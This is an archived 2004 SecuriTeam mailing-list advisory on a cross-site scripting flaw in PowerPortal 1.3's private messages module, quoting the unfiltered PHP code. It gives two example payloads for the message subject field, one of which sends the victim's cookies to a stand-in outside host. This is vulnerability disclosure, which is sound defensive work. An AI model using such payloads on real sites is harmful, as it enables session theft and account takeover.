[UNIX] PowerPortal XSS vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 07/30/04
- Previous message: SecuriTeam: "[UNIX] Artmedic Kleinanzeigen Allows PHP Code Inclusion ( index.php )"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 30 Jul 2004 10:37:51 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PowerPortal XSS vulnerability
------------------------------------------------------------------------
SUMMARY
PowerPortal is an advanced content management system powered by PHP &
MySQL.
A cross site scripting vulnerability exists in private messages due to
unfiltered input.
DETAILS
Vulnerable Systems:
* PowerPortal 1.3 and prior
Vulnerable Code:
From modules/private_messages/index.php (line 119):
function read_message() {
..
echo "
<center>
<table width='90%'>
<tr><td>" . SUBJECT . ":</td><td>" . $row['subject'] . "</td></tr> /* <---
Unfiltered input */
<tr><td>" . FROM . ":</td><td><a
href='modules.php?name=users_list&func=view_profile&id=" .
$row['from_user_id'] . "'>$from_username_format</a></td></tr>
<tr><td>" . SENT_AT . ":</td><td>$datetime</td></tr>
<tr><td>" . MESSAGE . ":</td><td>$message</td></tr> /* <--- Unfiltered
input */
<tr><td colspan='2' align='center' valign='bottom'><br><a
href='modules.php?name=private_messages&file=reply&id=" . $row['id'] .
"'>[" . REPLY . "]</a> <a
href='modules.php?name=private_messages&file=delete&id=" . $row['id'] .
"&from=inbox'>[" . DELETE . "]</a> <a href='javascript:history.go(-1)'>["
GO_BACK . "]</a></td></tr>
</table>
<br>";
}
}
As shown above the script does not filter user input and this input is
used later in HTML shown to the user.
Exploitation:
Example 1: shows the content of the cookie on a dialog box.
Subject: <script>alert(document.cookie);</script>
Example 2: cookie theft.
Subject:
<script>document.location='http://www.example.com/?'+document.cookie</script>
ADDITIONAL INFORMATION
This information has been provided by <mailto:vampZ@Hushmail.com> vamp^
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Artmedic Kleinanzeigen Allows PHP Code Inclusion ( index.php )"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|